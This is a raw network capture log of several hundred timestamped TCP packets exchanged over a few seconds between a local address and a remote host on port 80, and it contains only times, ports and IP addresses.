                                                        Dec 18, 2024 14:08:29.736999035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.737024069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.737946033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.738050938 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.738136053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.738951921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.739015102 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.739032984 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.739993095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.740057945 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.740081072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.741100073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.741168022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.741187096 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.742084026 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.742163897 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.742168903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.743154049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.743206978 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.743336916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.744460106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.744486094 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.744688988 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.768081903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.768107891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.768148899 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.768497944 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.768589973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.768624067 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.769503117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.769612074 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.769632101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.770531893 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.770590067 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.885921955 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.886048079 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.886111975 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.886508942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.886543036 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.886620998 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.887495041 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.887629986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.887686014 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.888541937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.888592005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.888642073 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.889574051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.889883995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.890026093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.890598059 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.890909910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.891015053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.891614914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.891724110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.891777039 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.892813921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.892899990 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.892977953 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.893785000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.894153118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.894243956 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.894747019 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.894761086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.894843102 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.895771027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.895883083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.895987988 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.896851063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.896886110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.896934032 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.897867918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.897882938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.897939920 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.898845911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.898852110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.898905993 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.899951935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.900053024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.900105000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.900999069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.901103973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.901151896 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.902040958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.902055025 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.902101994 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.902983904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.903206110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.903301001 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.904067039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.904124022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.904196024 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.905209064 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.905425072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.905493021 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.906277895 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.906384945 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.906733990 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.907212973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.907294035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.907342911 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.908269882 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.908283949 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.908368111 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.909255028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.909456968 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.909543991 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.910223961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.910300970 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.910377026 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.911220074 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.911367893 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.911422014 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.912333965 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.912463903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.912508965 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.913459063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.913472891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.913511992 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.914334059 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.914350033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.914407969 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.915364027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.915488005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.915559053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.916376114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.916508913 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.916554928 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.917489052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.917500973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.917716980 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.918433905 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.918540955 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.918598890 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.919606924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.919753075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.919858932 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.920629978 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.920644045 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.920912027 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.921705008 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.921720028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.921761990 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.922693014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.922801971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.923039913 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.923626900 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.923872948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.923927069 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.924731016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.924848080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.924916029 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.925717115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.925822020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.925885916 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.926693916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.926939011 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.927067995 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.927792072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.927874088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.927944899 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.928792000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.928925991 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.929131985 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.929855108 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.929955006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.930021048 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.930915117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.931133032 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.931274891 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.931920052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.932005882 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.932105064 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.932949066 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.933042049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.933099985 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.933963060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.934109926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.934211969 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.934962034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.935113907 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.935290098 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.936000109 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.936239958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.936300993 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.960510969 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.960618973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.960746050 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.960746050 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.960829973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.960905075 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.961738110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.962009907 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:29.962105036 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:29.962785006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.005824089 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.078121901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.078159094 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.078592062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.078702927 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.079216957 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.079767942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.079781055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.079828978 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.080720901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.080859900 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.081091881 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.081800938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.082153082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.082240105 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.082926035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.082938910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.083122015 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.083807945 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.083867073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.084074020 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.084796906 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.084856987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.084965944 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.085897923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.085911989 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.085980892 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.086833954 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.086968899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.087033033 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.087896109 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.088112116 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.088164091 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.088895082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.088964939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.089015961 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.089986086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.089998960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.090079069 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.091079950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.091190100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.091284037 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.092063904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.092231989 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.092735052 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.093147993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.093162060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.093230009 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.094181061 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.094196081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.094265938 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.097385883 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.097390890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.097425938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.097440004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.097464085 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.097480059 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.097568035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.097635984 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.098196983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.098304987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.098469019 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.099360943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.099381924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.099522114 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.100338936 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.100519896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.100573063 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.101346970 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.101363897 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.101406097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.102436066 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.102655888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.102771044 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.103362083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.103491068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.103543043 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.104480028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.104492903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.104552031 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.105598927 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.105609894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.105669022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.106605053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.106617928 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.106693029 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.107490063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.107603073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.107647896 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.108505011 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.108643055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.108776093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.109569073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.109678984 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.109735012 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.110729933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.110743046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.111064911 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.111655951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.111696005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.111757040 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.112646103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.112829924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.112921000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.113795996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.113811016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.113883018 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.114772081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.114974976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.115053892 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.115832090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.115919113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.115976095 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.116779089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.116959095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.117098093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.117878914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.117969990 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.118046999 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.118904114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.118984938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.119138002 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.119916916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.120002031 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.120079041 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.120954990 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.121020079 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.121099949 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.121941090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.122030020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.122075081 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.123086929 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.123100996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.123174906 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.124003887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.124125004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.124170065 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.125055075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.125169039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.125267982 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.126115084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.126240015 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.126367092 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.127156019 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.127227068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.127907991 CET4974680192.168.2.10176.113.115.178
